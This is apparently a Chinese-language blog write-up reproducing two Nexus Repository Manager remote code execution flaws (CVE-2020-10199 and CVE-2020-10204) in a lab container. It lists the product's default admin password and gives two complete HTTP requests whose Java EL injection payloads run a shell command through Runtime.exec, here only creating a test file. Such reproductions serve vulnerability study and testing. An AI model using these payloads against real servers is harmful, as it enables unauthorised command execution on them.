Nexus Repository Manager远程代码执行漏洞(cve_2020_10199、cve_2020_10204)复现

0x00 漏洞描述:

Sonatype Nexus 是一个 Maven 的仓库管理系统,它提供了强大的仓库管理、构件搜索等功能,并且可以用来搭建 Maven 仓库私服,在代理远程仓库的同时维护本地仓库,以节省带宽和时间。 在 Nexus Repository Manager OSS/Pro 3.21.1 及之前的版本中,经过授权认证的攻击者,可以通过 JavaEL 表达式注入造成远程代码执行,获取系统权限。

Nexus的默认端口为8081。
Nexus默认账号密码:
用户名:admin
密码:admin123

0x01 影响范围:

CVE-2020-10199:Nexus Repository Manager OSS/PRo <=3.21.1,需有低权限账号。
CVE-2020-10204:Nexus Repository Manager OSS/PRo <=3.21.1,需有管理员账号。

0x02 环境搭建:

使用:https://github.com/fofapro/vulfocus/blob/master/INSTALL.md中的漏洞镜像

0x03 复现流程

普通用户权限方法:
点击:


提交抓包,修改memberNames参数,创建/tmp/success文件

POST /service/rest/beta/repositories/go/group HTTP/1.1
Host: 192.168.83.40:46660
Content-Length: 292
accept: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) >AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.113 Safari/537.36
NX-ANTI-CSRF-TOKEN: 0.3170138167765151
Content-Type: application/json
Origin: http://192.168.83.40:46660
Referer: http://192.168.83.40:46660/swagger-ui/?_v=3.21.1-01&_e=OSS
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: vue_admin_template_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoxLCJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjoxNTg4MDUwODM0LCJlbWFpbCI6ImFkbWluQGJhaW1hb2h1aS5uZXQifQ.oxM4vBBagsMl1R1Nf-YNdeKI4fKUiCQY4PPZ9UR6OrE; NX-ANTI-CSRF-TOKEN=0.3170138167765151; _ga=GA1.4.1188408586.1587980353; _gid=GA1.4.198747155.1587980353; NXSESSIONID=c2ba012e-c120-4a7d-882c-dbdddf31779b
Connection: close

{
"name": "internal",
 "online": true,
 "storage": {
   "blobStoreName": "default",
   "strictContentTypeValidation": true
 },
 "group": {
   "memberNames": ["$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('touch /tmp/success')}"]
 }
}


提交数据包,进入docker容器命令行,发现成功创建文件

管理员权限方法
提交数据包,修改privileges参数,创建:/tmp/cve-2020-10204文件

POST /service/extdirect HTTP/1.1
Host: 192.168.83.99:8081
Content-Length: 294
X-Requested-With: XMLHttpRequest
X-Nexus-UI: true
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) >AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.113 Safari/537.36
NX-ANTI-CSRF-TOKEN: 0.8633824663792995
Content-Type: application/json
Accept: */*
Origin: http://192.168.83.99:8081
Referer: http://192.168.83.99:8081/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: NX-ANTI-CSRF-TOKEN=0.8633824663792995; NXSESSIONID=1fcc7eb4-da25-4df8-b1c9-49efdb884955
Connection: close

{"action":"coreui_Role","method":"create","data":[{"version":"","source":"default","id":"1111","name":"2222","description":"3333","privileges":["$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('touch /tmp/cve-2020-10204')}"],"roles":[]}],"type":"rpc","tid":89}


进入docker容器命令行,发现文件创建成功

你可能感兴趣的:(Nexus Repository Manager远程代码执行漏洞(cve_2020_10199、cve_2020_10204)复现)